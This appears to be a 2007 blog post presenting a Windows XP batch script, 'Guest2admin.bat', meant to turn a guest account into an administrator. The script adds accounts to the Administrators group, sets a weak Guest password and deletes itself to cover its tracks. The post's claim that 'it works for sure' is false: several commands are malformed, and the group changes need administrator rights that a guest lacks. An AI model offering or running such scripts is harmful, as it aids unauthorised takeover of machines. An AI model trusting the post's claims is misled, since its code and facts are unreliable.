How to convert Guest into Admin in windows XP


When you log into guest account in Windows Xp you cannot access some functions which are available for admin account. Although this point is known to everyone the reason why I am telling it here is because there is a way to convert this guest account into admin account. Isn’t this cool?

So, In order to make this change you have to type the below given code in NOTEPAD and save the file as “Guest2admin.bat”
then u can double click the file to execute or run in the cmd.
it works for sure:

Here is the code:

echo off
title Please wait…
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0

Note : While doing this make sure that you have Guest profile on or else this won’t work.


Technorati : , , , , ,

Filed under: Windows XP

December 25, 2007 by: Prasanth Chandra

Comments

Leave a Reply to Martin